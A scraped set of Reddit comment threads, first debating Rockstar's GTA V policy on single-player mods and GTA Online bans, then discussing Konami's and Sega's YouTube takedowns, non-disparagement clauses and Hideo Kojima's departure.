source? and by that i mean actual proof, not unverifiable claims or circlejerk rumours. also be aware that this is the third time i have asked this question and am *still* yet to get a response apart from upvotes (which honestly don't fucking matter) I didn't word my original comment correctly , I've even replied to other comments saying that I'm sure a lot of people who got banned did actually have mods online despite them not using them, what I mean was, a lot of people are saying they were banned for only modding singe player, but if they go online with those mods still enabled, even if they don't use them, it's still going to show up on R* anti cheat. and i'm asking for actual proof of that statement, not unverifiable claims (like people saying they were banned for only modding single player mode) or circlejerk rumours. in other words i agree with what TotalBiscuit said in his recent video. It's interesting to see those posts. Especially the ones from people saying they were thrown money by someone who was cheating and were banned because of that. Why? Because the night before the initial banwave, I spawned in well over $100million between several players and none of us have been banned *yet*. I fully expect it to eventually get around to me when Rockstar review my account, but unless the flag for money gained in jobs is above $40million in one day or only applies to public games, the people saying they were banned for picking up money are either unlucky or full of shit.

Not to say that Rockstar can do anything but fuck off with their tedious online grind and its inherent limitations. Hopefully as many private server projects slip through the cracks as possible, or have key team members outside of western legal influence. LCPD:FR multiplayer was much more enjoyable than any official modes in GTA4 and SAPD:FR has the same potential. Back when people were giving out billions in winter 2013 on 360, a bunch of friends and I invested most of that money into high value cars on the chance that if the money gets reset, they hopefully wouldn't take the cars.

They didn't so we each had a 10 car garage worth like 5-6 mil. Just a thought. You guys invented money laundering in a game about being criminals. Can't they just make different .exe files for SP and multiplayer like in PC version of CoD? That would break the character switching and "seamless" transition from single to online, I believe. AKA, the super long loading times  It's actually really fast if you just start a closed session and invite only your friends -- I only found it slow when trying to join random public sessions. It's not the loading time, it's the time it takes you to find an open session with a similar connection. My cousin uses Google Fiber and never waits longer than 5 seconds when joining online. [deleted] Actually, thanks to the game's fantastic UI design, you technically can't start a new closed session from the online mode.

You have to load the game into story mode first, then go into the Online menu - you can start a closed session from there.

The game will then put you into free-roam all by yourself - you can invite friends as needed. From my experience, it will then keep you in that same free-roaming instance between missions, so you don't need to wait 2 minutes after a mission ends to move on. Your group *should* stay together as well, but in my experience sometimes it bugged out and I had to re-invite people. You're gonna love this... due to even shittier design you can get around this.  Start in play online, go to the editor, pause again &amp; you magically have the SP pause screen where you can start a private session. Significantly shorter than having to relaunch the game. Can't one exe launch another?  then you would reload the assets back into memory which would effectively just double your load time. huge waste of time. what they programmed isn't perfect but it isn't stupid either. You can transfer loaded assets with different methods of IPC, but it's a pain in the ass. (Easier with "fork" on a POSIX system.) It's just a lot of work that they wouldn't've wanted to bother with. Well, yes, but that still requires launching an executable during gameplay. That would still count as completely relaunching and would take a lot longer. Not if all I'm doing is planning on playing one or the other.  I rarely do both. Sure. But given the choice between faster SP/MP switching and mods, I'd choose mods. If when disconnected it just kept all the assets loaded and tried to reconnect or just have a button prompt to reconnect it would be far shorter than loading all the single player stuff again. No, but you can apply a command line to it to only launch SP. Really??? How do I do that? I've been meaning to try some mods, but I'm terrified of getting banned. Does that launch you straight into the single player game?  It doesn't load up any MP component correct. But I mean, it bypasses the game menu?  I launch the game, and once it's done loading, I'll be in the single player game? You can already set the game to do that from the options menu. The game puts you in SP if you don't do anything in the menu for a few seconds anyway. At least the Steam version does. Why don't they make it so multiplayer just doesn't start if mods are detected instead of just outright banning you? It really should. But not all mods work that way. Some do their work purely in memory. The reason to ban when mods are detected instead of just not letting you enter multiplayer is because doing so makes it much harder to cheat. Cheaters can get banned early on while developing their cheats instead of being able to keep trying until they find a way to get around the block.

Pretty much nobody writes software that works the first time. You always have to retry. I just purchased the game and havent tried MP yet. So how do keep Mods separated? Can someone explain this to me very detailed? As of now:

* Copy mod files into game directory if you want to play singleplayer
* If you want to play GTA:O, exit the game completely, delete the mod files from the game directory, start the game again Or use a mod manager This is the easiest way right now: https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/ as usual people jumped the gun with these ridiculous claims that they were banning mods for SP. no shit they weren't. it might as well be the same situation with ENB and GTAIV where boris (creator of ENB) started making ridiculous claims that rockstar was trying to stop modding with the latest patch, and then made a hissy fit about how he wasn't going to update the ENB for the newest versions. turns out all rockstar did was change shadows which accidentally broke his mod.

now rockstar, wouldn't it just be easier for you just to add the ability to have the max FOV changed from 80 to 90 at least please? considering a modder did it the day after release, it will make everyone happy. it would make FP mode more playable, especially on online. i really hope they do this, it's quite strange to see they haven't properly acknowledged this yet. &gt; as usual people jumped the gun with these ridiculous claims

Pretty much the tagline for this subreddit.

Remember the Max Payne 3 authentication server drama? I hope that /r/games never gets any more stupid than that. Man, have you seen the gtav and gtavpc subs? Advocating piracy and all other manner of cringeworthy rage... Over something that didn't even happen (nobody was banned for offline mods).

I lost it when i saw them stating how r* was too stupid to develop for pc, a bunch of pc master race entitled nonesense, and that pc gamers should all go pirate it.  So rockstar will stop poluting their platform or some nonesense... And evidently the community agrees judging by the upvotes.


I swear, if i didnt know better i would think the internet is full of crazies.  The pc master race just isnt the pc master race now that these pc master race idiots came.  It makes me long for the console community.  Which i will add, abused the voice chat in game a hell of a lot lesd. If a modder did it and 30% of the time it doesn't work, it's fine. 


If R* did it and 0.5% of the time it fails, they will be the worst company of all time, equal real with ubi and EA The thing is, they already have a slider that works properly. They just chose to set the max possible to an arbitrarily low value.

People with triple monitor setups are getting a decent FoV, which means it's in the game, which means it should be possible. No shit you can use mods on single player. People have been up in arms like they would actually possibly intentionally/outright ban single player modifications. The problem is, a lot of these single player mods are using programs and hooks that cannot be distinguished from hacking programs... and considering the integration with RMT Transactions and the online functionality... That's why you use the Mod Launcher. &gt; We have a long-standing policy on posting copyrighted Rockstar Games material &lt;...&gt;, weve just added a bulletpoint about this particular type of content &lt;...&gt; anyone who posts videos that encourage and promote ways to cheat your way towards gaining illegitimate RP or counterfeit in-game money or duplicating in-game items without having earned them may have their videos flagged for takedown with YouTube.

Why is no one here talking about this? I for one say this new bullet point is great! Because as of right now if I get on youtube and try to find some moneymaking tips all I get is glitch exploit videos page after page. Maybe from now we'll be able to find more decent videos about GTA V Online tips and tricks. No shit. Anyone who got banned was dumb and connected to MP with mods enabled, then went and lied because they were mad.  I think the bigger story in this Q&amp;A is the fact there will not be new heists released any time soon. I basically read it as "No new heists ever" And there you have it. Just like I expected. People who got banned, got banned because they used mods in multiplayer. If you have a FOV mod you have an advantage in multiplayer, that other people don't have. If you use any dll injector, Rockstar can't know what mod you run. This is obvious and grants a ban. Rockstar are only banning for two weeks, so it's not too bad anyway. Just a whole lot of noise about nothing. &gt; If you have a FOV mod you have an advantage in multiplayer, that other people don't have.

I disagree with this unless the game is restricted to first-person only in which case yes it is unfair. Otherwise, especially in free-roam, having a larger FoV is no more an advantage than the guy that can see around corners in third person. Everybody keeps saying that using the FOV mod gives players an advantage, but if you have a tri-screen setup, you get a huge FOV using the vanilla game, so should that also not be allowed because of the advantage it provides? &gt; If you have a FOV mod you have an advantage in multiplayer, that other people don't have.

Every different aspect ratio has a different FOV. "Balance" is a bullshit nonsense argument. &gt; FOV mod you have an advantage in multiplayer

Except I can't even play first person with 70 FoV without feeling sick. 90 FoV is such a tiny advantage to begin with. IMO it's pretty dumb to be banned  for something that not only can other people already get with multi monitors, but something that actually makes that part of the game playable for me. awesome, now everyone can focus on how good single player and modding is compared to Online play, which is stale, repetitive and so boring. Who honestly still gets fun out of endless games of team deathmatch? People are mad because they either accidentally or on purpose went to connect to GTA Online while having those dlls in the main game directory. Rockstar scans your directory as soon as you decide to enter GTA:O, if it sees unacceptable files, they ban your account, simple as that.

GTA:O should not allow any sort of mods, no matter their purpose, ever. It should allow mods in private matches with friends or solo. Glad they have broken the silence on their mod policy. One thing to have it in the EULA or have the support teams making contradicting statements., but it's nice they made a statement without the legal mumbo-jumbo.

~~Edit : honest question, not complaining, but why am i being downvoted? It's one thing if I was off topic or spewing wrong information. But this is just opinion about the current situation.~~ ignore my whining.  [deleted] This is off topic but how on Earth do I obtain that sweet platinum Deagle with the gold hardware in that screenshot? Is that just what the platinum tint looks like on PC? That is a preview of the next content pack. The situation is still unclear about FoV mods it seems.

&gt;protecting GTA Online against modifications that could give players an unfair advantage

Are they categorzed as such or? You cannot tell what a DLL injector is doing, so those will always be rightly banned in online. Rockstar should fix the FOV though In order to avoid gray areas, GTAO should remain a completely *mod-free* game mode, including FoV mods.

As soon as you start allowing certain mods, then people will want other mods to work.  And now you have a situation where R* has to make a list of mods that do work, and don't work, and approve certain mods but not others.

This also opens exploitative loopholes for cheaters. They should just patch that stupid slider, sheesh  It's also a lot harder for anti-cheat software to tell the difference between an FOV mod and something more malicious like a wall hack. It seems pretty clear to me from my understanding FoV mod works like most, if not all other mods currently, which is DLL injecting and from what people smarter than me have said, you cannot whitelist or tell what someone is specifically doing with a dll.

So its not like they are specifically targeting FoV as an "unfair advantage". They're banning all mods online that use .dlls. That's how they're protecting "against modifications that could give players an unfair advantage", by killing the lot. It's impossible to determine what an injected DLL is doing. There's no real way for them to ban aimbots or wall hacks without also banning FOV mods that rely on similar methodology to work. &gt; Our primary focus is on protecting GTA Online against modifications that could give players an unfair advantage, disrupt gameplay, or cause griefing.


Because an FOV mod that makes the game so much more tolerable is unacceptable. And before you say "unfair advantage", remember that you can play in third person, and you can go *really* far away from your character in third person. There's really no reason to have such a narrow FOV in first person.


Still, I understand why they are doing what they are doing, and it is definitely good news to see that they aren't banning people for single-player mod use. So this is a good start. Hopefully, they can fix the damn FOV, and one of my main complaints about the game is solved. &gt;Because an FOV mod that makes the game so much more tolerable is unacceptable.

It doesn't work like that. They can't just block all but ONE particular mod. I'm very much aware, I think I misrepresented my point. I understand why they're blocking mods in Online, completely. 


What I was trying to say, was the FOV is ridiculous and I wish they would fix it.  I'm so happy to hear the rockstar editor is coming to PS4. But can someone tell me, are you able to use it to make videos from GTA Online? If not I'm not sure I want it after all. What about the single-player mods that implement multi-player? Great, so maybe we can stop diluting the Steam reviews section with even *more* bullshit than usual? I wonder if its possible to run win 7 in vmware while using dedicated hardware to run gta v and install as many as mods you want offline. yay let's just ban people instead of warning them and let those 10 year old play the game.
 
i'm done with rockstar It's good to see single player mods might make a return, it seemed strange to release a PC version of the game and not allow ANY mods for it. It'd be nice to see mods be useable in private lobbies, but it doesn't seem likely. This sort of behavior is nothing new for Konami, sadly.

In late 2013, Konami was the console publisher for Skullgirls. Konami delisted Skullgirls around the end of the year, much to the developers' displeasure. [Konami told the developers (Lab Zero Games) that they'd make the relisting process easier if they signed a lifetime gag order that'd prevent them from telling other people what shitty publishers they were](https://twitter.com/Skullgirls/status/597581781278334976). Lab Zero didn't sign, and it took another month or two for Skullgirls to return to the console marketplaces. They had to break ties with Konami to do so. Don't forget they blacklisted Jim Sterling after he said some unkind things about them and their games. 

Not like it stopped him from reviewing their games, he just had to buy them now. I think they even asked for an apology from Destructoid (where he worked) at the time. An apology from Jim Sterling for pointing out how shitty they were being... yeah. And the apology was just "a start". Of course, they didn't apologize. It is hard to justify supporting Konami at this point.  Which is a shame, because seeing the Konami logo used to mean quality. Now it means a company that doesn't give a shit.  back in the NES and SNES days, Capcom and Konami made some of the best 3rd party games on the systems. How the mighty have fallen! [:'\(](https://www.youtube.com/watch?v=C0vznFnBWAY) This is unfortunately the case for the majority of publishers these days. Just about every company has managed to burn half the bridges that allowed them to be successful in the past and they are barely treading water now because of it. I think part of it is that in the past we just didn't care.

I mean, when I was 8, I didn't give two fucks if the company who made TMNT Turtles in Time was shitty or not. There isn't anything stopping this from being true now except for the fact that these companies are spending millions and millions of dollars on games to try to reach as broad an audience as possible. This in turn means if they don't sell millions and millions of copies they are considered a flop financially. 

To be honest I would rather a game be good than worry about how amazing the graphics are =/ Hell yeah, alien isolation,  did poor because it "only" shipped 2.11 million copies, 

Yeah fuck off,  for a game that totally different from whats in (slow, minimal combat, atmospheric horror game, focus on appealing to existing fans) especially with it following the shit show that was Aliens:colonial marines,  it did really well.  That was like back when Square tried to say one of their games (I can't remember which exactly) did poorly when it sold 3m+ copies. To me if a game is selling even 2 million and isn't considered profitable then maybe something has to be changed.  It was the Tomb Raider reboot that they said that about.  That game has since gone on to do very well for them with the HD re-releases. Too much money is spent on advertising and middle-men who do nothing. Same thing that happens to every industry as it reaches past its infancy.  I feel like this is at the core of what's ailing the AAA industry right now. Great innovative games can't pay for themselves. TMNT Turtles in time wasn't shitty though!  It was a sequel and not so groundbreaking, but it was fun and popular for it.  These days Konami is just pumping out as much unplayable garbage as possible and trying to silence anyone that wants to tell you they're doing it.  

They could do very well with more fun games like they had back in the day when they owned the sidescrolling shooter and multiplayer action games... but they don't want to own, they just want to sell as much garbage as they can hide under DMCA letters.

Hell, at this point modernized sidescrolling "New Super Contra" would make a ton of money without taking forever to make, but nope, they make crap that's hard to like instead...  and get mad when people realize this truth. Quality doesn't leave enough room for profit, apparently. Maybe they should stop spending so much money making bad remakes of games nobody asked for and bad HD ports =P I like that they talk about diminishing sales, yet the franchise exclusive to one console.  Did that arrangement make up for lost sales?

Like others have said, I think they are using that as an excuse to get out of the business. It really does seem like they just want to get out of the gaming business for whatever reason. I just can't fathom any other reason considering how good most of their games used to be. Games aren't profitable, compared to the emerging markets they're trying to get in to (like gambling machines, if Japan decides to legalize them). And according to Jim, nothing changed with the blacklist, because they always forgot to send him review copies of the game either way. [Here's last weeks' Jimquisition, which discussed these things](https://www.youtube.com/watch?v=ynl4sIFazmM) It's funny because in the latest video he posted today he mentioned "Pretty soon they will be issuing DMCA for PT videos." Then this happens today. Pretty sad to see Konami taking this route =/ SEGA (of Japan) issued YouTube takedowns on Shining Force videos (including videos that had no actual game footage, such as 100%-webcam vlogs) to try to improve the search ranking for certain Shining Force videos put out by SEGA. A move that has John Bain (TotalBiscuit) boycotting them to this day.

(Also witness Nintendo's draconian YouTube policies in contrast to every other decent AAA company's.)

So that's three Japanese companies who are dickbags (bags of dicks) about video-form commentary and critique, or videos in general. Gee...I wonder if that's a pattern. That's the kind of thing that makes me want to flood YouTube with completely unrelated videos that have Shining Force in the title and as a tag.  "The Best Kubrick movie is The Shining force all your friends to watch it." It does seem to just be Japanese companies trying this (aside from the off shoot random tiny developer that wants to stop criticism for their badly done game). They have been doing some bizarre moves in general recently this just seems to be one more  In one of the last Jimq, Jim commented that they expected their games to get better reviews too.  And their embargo does't even really affect Jim, because Konami's shitty marketing department rarely send review copies out on time and Jim has been already buying his own games to review. What exactly is a lifetime gag order? It doesn't sound very legal to me.  "It is an order, typically a legal order by a court or government, restricting information or comment from being made public, or in some cases, passed onto any unauthorized third party. The phrase may sometimes be used of a private order by an employer or other institution."

Basically, they couldn't talk about how Konami treated them when they were publishing Skullgirls but since they didn't sign the form (and well managed to get game back to the stores), they can actually talk about the truth. This is typically a non-disparagement agreement, where in exchange for something from the publisher (publishing their game in this case) the developers would contractually not be able to say anything negative about Konami for risk of lawsuit. 

These non-disparagement clauses work because usually the non-disparagement clause comes from the assymmetrically powerful side. The most common in the US is an employer firing an employee and attaching the non-disparagement to a severance package. In this case, it's a publisher trying to force a developer.

EDIT: typo fix, said "developers" where I meant "publishers" Happily did not sign mine when they laid us all off. Their severance package was pitiful to begin with. I honestly wonder how enforcable such clauses are (specifically the "you're not allowed to be negative" bits). It's questionable, but certainly can have teeth if you make your criticisms openly public as opposed to just badmouthing them over dinner. 

There's actually a federal bill being proposed right now to make these clauses unenforceable. I'm a big fan, personally.

The ones I've seen don't say "you're not allowed to be negative", they actually say that both you and the company may not say anything other than to confirm that you worked there and were in good standing. So the gag claus applies to the company too, it's just that the company typically won't care if it's prevented from giving you a good or bad reference. While we're at it, let's get rid of those non-compete clauses that can be written with no expiration date as part of *severance agreements*. My friends in the legal field tell me that these are almost unenforceable, but that doesn't mean they're not a headache or that they don't intimidate people.  Disclaimer: IANAL

It depends on the country/state and the nature of the restriction. 

http://www.mayerbrown.com/Global-Guide-to-Restrictive-Covenants/ has a pretty good overview of these kinds of restrictions with breakdowns for many individual countries. (The relevant pdf is http://www.mayerbrown.com/files/uploads/Documents/Guide%20to%20Restrictive%20Covenants/MAYERBROWN_RESTRICTIVE_COVENANTS.pdf) Non-compete clauses are generally unenforceable if they are not reasonable and justifiable based on metrics of time and geography.

In other words, a non-compete clause cannot be for a significant period of time, nor a broad geographic region.  One to two years can be justified and reasonable.  But you cannot tell a person that they cannot practice their given trade for ten years (people need a way to make money.).  A non-compete within a given city or county is reasonable, but across the entire US would be unreasonable.  

 &gt;  So the gag claus applies to the company too, it's just that the company typically won't care if it's prevented from giving you a good or bad reference.

Technically this is already in place just nearly impossible to enforce.  When a company contacts an old employer, 'technically' they can only say when you started, when you left, and possibly how often you were late, called off, very factual things like that.  Not sure about the last part.  Anything more can get them sued for slander IF you can prove that it was the reason you were not hired but that is a very big if since the proof is on you prove it was a reason not on them to prove it wasn't.  probably isnt it would have likely been in actuallity an NDA which I believe might not have the same laws. It's just a clause in a contract. You break the clause, you break the contract. If you break a gag order that doesn't make you a criminal - just subject to the penalties of breaking your contract. [deleted] can we get a possible mirror link so we can see what the original video was? Mirror from the neogaf thread: http://m.neogaf.com/showthread.php?t=1044229

Youtube Mirror: https://youtube.com/watch?v=YNSVhbsJyDQ

Dropbox Link: https://www.dropbox.com/s/cbyvrrfyx1mp13i/Kojima%20vs.%20Konami%20An%20Investigation.mp4?dl=0 just a reminder to people who see superbunnyhop for the first time because of this thread - he makes a TON of *really well thought out* gaming videos. i definitely recommend checking out [his channel,](https://www.youtube.com/user/bunnyhopshow) it's really good stuff. Wow, he does put out some good stuff. I just watched [this](https://www.youtube.com/watch?v=emW15aLYbp4) video summing up the Valve paid mods fiasco from a coupe weeks ago, and it was a very well thought out synopsis of what happened. I started watching his stuff after this report and his stuff is real good. Well written, thought out, interesting perspectives (ie: how he didn't enjoy Spec Ops: The line but thinks it's a good game). I was for the paid mod stuff (in abstract) but he changed my mind with a slight different perspective. He hooked me with his Metal Gear Solid 2 and post-modernism video. That video is fucking awesome I love his videos and he is possibly one of the only people that can make so much sense out of MGS.  His intelligence and enthusiasm are obvious. The ONLY gripe I have is that sometimes he pronounces words a little funny. Like he has only read them and never heard it said out loud.  In "comparishun". The comparison with the ideals and the shortcomings thereof with Rapture was so perfect.  He's probably the only time 'game' and 'journalism' could be used together without busting out laughing Probably because he has an actual journalism degree. 

And avoids click baity topics/rumors/baseless speculation that all the other "games journalist" partake in. Does he have a Patreon or something? I would like to support him a bit more than usual if possible.  Thank you! While I liked the video, I can't help but feel that the presentation could have been greatly improved by just putting it together into a written format with pictures. I'm not a fan of "articles" being dictated orally to the background of images not necessarily important for the content. Especially when they're DMCA'd for the irrelevant images and stuff going on in the background. It is also back up as of this comment. What grounds for copyright infringement could there have been anyways?  [deleted] Yup, they have to do it this way because Youtube's system is not a TRUE DMCA claim to start with.

The initial DMCA claim is just a private matter with Youtube. If contested, the claimant has to either rescind the claim or file a real DMCA claim in court.

That's why so many of these takedowns are reversed after a few weeks. If they weren't, the offenders would be in actual violation of the law. That and a lot of them are "fakedowns", people posing as the company or authority. And that's largely an unfortunate result of the Viacom lawsuit. &gt; YouTube's the one with the "shoot first, question later

Groin stab first, remove knife weeks later. And in the meantime, he loses revenue. IINAL, but I wonder if he has a case to sue for damages (whether he can afford to do so is another story.) I think it had footage of P.T. from what people are saying? Grounds are shaky (and bullshit) as fuck. Note to self in case I ever want to make a video go viral: Include footage that may or may not infringe copyright from a stupid company. You have to be big enough that the company notices you in the first place though. Calling it shaky is even too much. Konmai has zero grounds for citing copyright infringement considering Super Bunnyhop's usage of PT footages falls entirely under fair usage laws. &gt; What grounds for copyright infringement could there have been anyways?

There aren't any.  Fair Use laws in the United States *expressly* cover the re-use of copyrighted works for the purpose of analysis and discussion. A lot of the time on Youtube when a company files an infringement claim it is taken down regardless and it is the Youtuber's problem then to fight to prove that it wasn't.   Seriously, what the fuck is going on at Konami at this point? It's like they're trying to memory hole the entirety of their involvement in the gaming industry. They're leaving the industry, simple as that.  Yeah it really seems that way, but it still seems like they are going about it weirdly. If theyre just trying to back out of the gaming industry, why would they go to the entire metal gear backlog and pull kojimas name off it? Granted they reinstated it after public backlash, but still. Yeah, it seems like Konami is going out of their way to agitate people. Why not just quietly release (or cancel, if needed) their current games and make a formal announcement at some point that they are, in fact, leaving the industry to focus on other areas. I kbow theyre at least pulling through with phantom pain. But yeah, i dont see why they arent being more professional about this. It seems like some of the higherups are personally upset with kojima, and are intentionally trying to spite him Haha if they didn't go through with The Phantom Pain I would cry myself to sleep multiple times haha [Hahahaha.. ha....... ha](http://i.imgur.com/daIN2S4.jpg)

MML3 being cancelled I could understand, because it was extremely early in development and it wouldn't have been the best business decision for Capcom to release it (according to them, which I'll give them the benefit of the doubt about). But MGSV? After so long in development? Literally 4 months from release? I don't think I could mentally handle it. I'd be liable to protest or something. I dont know what id do haha. GZ would be a worse tease than pt though Or, like, sell off the gaming segment to another company so they can continue, and Konami makes money...? There was talk of an extremely bitter power struggle at Konami, one which Kojima lost, and this could be a case of the winner trying to twist the knife and show Kojima who is boss. I know about the struggle, but it just seems damn near chlidish to do something like that. Itd be like re-releasing all the alien movies but pulling ridley scotts name off them, just because they wanna make a new one without ridley scott. Even if it sounds ignorant, Japanese companies are just fucking mental! At least the big ones in the entertainment industry. Weirdly. I suppose that's one word for it. Its... more prudent of them than I'd expect.

See rather than explosively cancel all release and completely pull out what they're doing is dialing things down slowly. Soon, I expect, all we'll see from Konami for the non-mobile market is nothing but sequel after sequel because that's safe. That's a guarantee at making money.  [deleted] [deleted] [deleted] Wouldn't it be a better option for them to sell the digital entertainment part to a different company?  It's not doing as well as they use to, but it's not like they're losing money from what I understand. Because they are going to leverage their ip by turning them into gambling machines like they already did with contra and other classics.

They are going to whore out Metal Gear and Castlevania for years to come at pachinko parlours and casinos. :( There has to be an easier way to leave the industry than this though right? What I don't understand is while I love Superbunnyhop's videos the Konami video wasn't really viral. The dude only has 100K subscribers (which is criminal if you ask me he deserves so much more) so why the takedown? Who actually thought this was a threat or harming Konami's image? If anything now more people are going to hear about this and try and find mirror links and hell maybe get George more attention than he ever would have gotten. I just don't understand whoever filed the takedown what they were thinking? If the video had views in the millions maybe I would understand but from what I remember the video wasn't as viral as it should have been.  The funny thing is that since the DMCA, it will attract more people to watch the video than before. In this day and age, I don't understand people that think this sort of crowd control works Youtube should have a link to: http://en.wikipedia.org/wiki/Streisand_effect right before you file a DMCA with a note saying that if the DMCA is illegitimate it will attract more attention and that a DMCA is not an effective way to censor a video. This comment chain exists in every thread reporting on someone censoring content online. Usually as the top comments. Still, companies never learn.  The big companies only answer to money, if an action would cost them a lot then they would stop do it. Sadly there will never be any fines or anything for false DMCAs on youtube. They generally care about PR as well. Good PR can correlate to good sales, and vice-versa.  This is Konami we are talking about, they wouldn't know what good PR is even if it hit them in the face. Plus, if they are on their way to downplay their video game business ventures they probably wouldn't give two shits about PR. 

Metal Gear, Castlevania, Silent Hill. Just churn out shit sequel after shit sequel. The massess will eat it up. 

After all... look at CoD. Battlefield. I hope this whole thread realizes it's a self-realizing claim. So because you've heard of it and its become popular after an attempted censoring = Streisand effect is real in all cases in these kinds of attempts.

But, of course, you haven't heard of any of the times it has worked and it has been effective and something has been smothered before it reached any kind of critical mass. How many times does this form of censorship work, for the number of times we hear about it? Unfortunately, I think it may be quite effective. Where else can I watch it? I've already seen it, but if it's available elsewhere, that gives me some hope. I like his videos a lot, and I'd like to see them preserved and available to others.  https://youtube.com/watch?v=YNSVhbsJyDQ video
https://www.youtube.com/user/bunnyhopshow channel I'm actually happy that this happened because it will probably give George's channel a significant boost in publicity. I had never heard of him before, but I just subscribed and am trying to track down that video. This reminds me of when Sega did a false DMCA on Totalbiscuit when he was playing the shining force games. False DMCA is illegal and Konami should be punished for that shit but i doubt they ever will be unfortunately.  Sega DMCAed Shining Force across all of youtube shutting many channels down completely as part of a marketing campaign for their next game. I believe they wanted their trailers to be the top search results. They still have not lifted the strikes. Yeah i heard about that and Sega can go fuck itself for doing that shit. They shutdown tons of channels and probably ruined people's entire youtube careers just for some marketing campaign bullshit and they never faced any legal consequences. Even Ubisoft isn't dumb enough to do that shit and Ubisoft is a pretty corrupt company.  TB *still* refuses to mention any Sega games as a result. They were essentially blacklisted by the biggest gaming youtuber because they're idiots. He's said multiple times all they have to do is apologize and he'll cover their games again, yet it's been years and still nothing.  I'll let you in on a secret: I don't think SEGA cares. Sega Japan doesn't care. The folks at Creative Assembly and Relic care but can't do anything.  Will nobody think of the second parties?!  Seriously. Relic is awesome.  It doesn't even make sense from a business perspective why Sega wouldn't apologize to TB. Sega seriously fucked TB over as well as tons of other channels so they should apologize, and focus on getting all of the channels they shut down back online. Consumers love to hear when businesses own up to their mistakes and fix the problem so they would only be good publicity for Sega plus they'd be able to get TB to cover their games again so they'd be improving their marketing as well. It makes perfect sense why Sega should Apologize and fix the problem but they refuse to do it. It's like Sega is run by a bunch of stubborn children instead of intelligent business men. &gt;when Sega did a false DMCA on Totalbiscuit

Didn't Sega do this to everyone they could, TB included? I recall Sega doing it to everyone for Shining Force. If it's enough to fill out a fucking form to take down someone's video there should also a be form for the defendant, that, if the claim was wrong, enables them to get reimbursed for missed revenue and reputational damage. I agree but unfortunately Youtube's takedown system is pretty shitty and overly favors the company doing the takedown instead of the content creators that keep youtube alive.  100K subscribers is not small.  It's not giant, but it means they are viewed regularly.  I didn't mean it as a bad thing I just meant there are other gaming channels on youtube with much more subscriptions. Case in point Totalbiscuit has over 2 million subscribers. I could see why they would take down a video if TB did it. SuperBunnyhop I felt was always underrated and a little niche.  His videos only get 50,000 views while TB's get double or triple the amount.  It's undoubtedly because he reported on someone from inside the company giving him information he shouldn't have. His source said they were about to fire a lot of people and that the business really sucked along with a bunch of other info. I cannot wait to see what Hideo Kojima will do once he is freed from Konami's utter bullshit. I made a joke with some of my gaming pals that Hideo Kojima could literally walk into any game studio in the world and sit down at a desk and begin working and no one would stop him. He is at that damn level. I wouldn't be surprised if one of the big three (Sony, MS or Nintendo) snatch him up right away for a good first party IP.
 I wouldn't be surprised if he's already hired, and just finishing all his loose ends at Konami. I hope he hangs out with Platinum Games for a bit. I'd love a Kojima-filled game in the spirit of Rising/Bayonetta. I don't think Platinum could afford him unless they had some deal lined up before he got there. He will mostly likely start his own studio though.  Probably, but you also never know; wherever/whatever Kojima's future project is, it probably won't be very hard to find a publisher for it, and a Platinum game with Kojima as director or writer would be a pretty strong pitch for various publishers, I'm sure there are a few who would be willing to help pick up the tab. he actually got a job offer from coffee stain studio's in their new goat simulator  game. I dont think it was serious and more a sign of support and admiration. I'm sure they are leaving the industry, wouldn't be surprised to see an announcement that basically says 'Guess what, series like castlevania, silent hill, metal gear,   they are all dead, you'll never see another one of these games again,' hell, i'd be surprised if they let the IP's just rot and refuse to sell them at this point just to spite us.  That's what i'm seeing from them right now Actually you can look forward to still playing those games in Slot Machine form...

[Look what happened to SNK](https://m.youtube.com/watch?v=F8P6NJ7S5ZM)

Ugh..! They already did that with [Parodius](http://thumbnail.image.rakuten.co.jp/@0_mall/a-pachislo/cabinet/01568455/parodeus.jpg) some time ago.

But hell, most of the people involved in that series are long gone anyways, I'd probably hate a new game, especially if the people who made Otomedius worked on it. That is the shittiest slot machine.  

Related note, though, Williams acquired Bally/Midway, then closed the doors to the pinball business in 1999 to focus solely on slot machines.  Sad times.  Nah. THey'll just continue to milk them all. [Even Metal Gear.](http://www.konami-digital-entertainment.co.jp/en/news/topics/2015/0320/) well you can look forward to things like Mighty No. 9 and the Castlevania "successor" on kickstarter.  It'll suck if those IPs all really die but it's better than nothing.  Might be hard to recreate Metal Gear though. I think we should all remember that, despite what Konami has been doing, they are far from dead and they don't depend on the US video game market. 

They released their 4Q earnings on Friday, and they beat analyst estimates. Their income increased 50% FY15 from FY14. Most of their increase came from mobile games. That's exactly it, they are focused in mobile and what ever the hell else. If you saw the Super Bunnyhop video, they have their fingers in many more pies than one would realise (from a video game perspective).  Yup. So even if they lose all of their US customers, they will be just fine. They're likely bailing on the video game market. Unfortunate decision for people who like their IP (Metal Gear, Castlevania, Silent Hill, etc.) but the quality of these titles aside from Metal Gear has dipped for a really long time and I don't think the IP is powerful enough to lament it as long as a spiritual successor exists.

Iga just released his [Castlevania-successor kickstarter](https://www.kickstarter.com/projects/iga/bloodstained-ritual-of-the-night), I'm sure if Kojima wants he can make a new horror game, etc.

Good riddance to be honest. Do it right or don't do it. They are dead as a console game maker, and that's all which should matter for us. The problem is that they own a lot of franchises people love. Video game IP lawyer here. I deal with DMCA takedowns on a daily basis (sending and fighting against them).

What Konami did here was incredibly stupid, shortsighted, and ineffective, but it wasn't **illegal** as some people here are suggesting. 

Konami probably didn't file a DMCA claim under the penalty of perjury. The first step with YouTube is usually just an informal copyright notice that doesn't involve any penalty of perjury or any other legal requirements. 

Furthermore, even if they did file a DMCA claim, they could probably just say that they were filing it based off of the small amount of their copyrighted content that was actually used in the video. For instance, look at the emails  at 1:06 that are technically copyrightable material. It would be a super weak claim that wouldn't hold up in court, but it would probably be enough to get past the perjury requirement.  The video also contains cutscenes and video from some games (are they Konami games?) - if so, it would be an even stronger basis for not committing perjury. 

What Konami did here was pretty stupid since it's obviously going to bring even more attention to the video (hello Streisand Effect) and will be solved by a simple youtube appeal or DMCA Counterclaim, but not illegal. 

I also wrote about YouTube's copyright takedown process for Gamasutra and how people like Super Bunnyhop can fight the claims: http://gamasutra.com/blogs/StephenMcArthur/20140624/219589/How_to_Beat_a_YouTube_ContentID_Copyright_Claim__What_every_Gamer_and_MCN_Should_Know.php
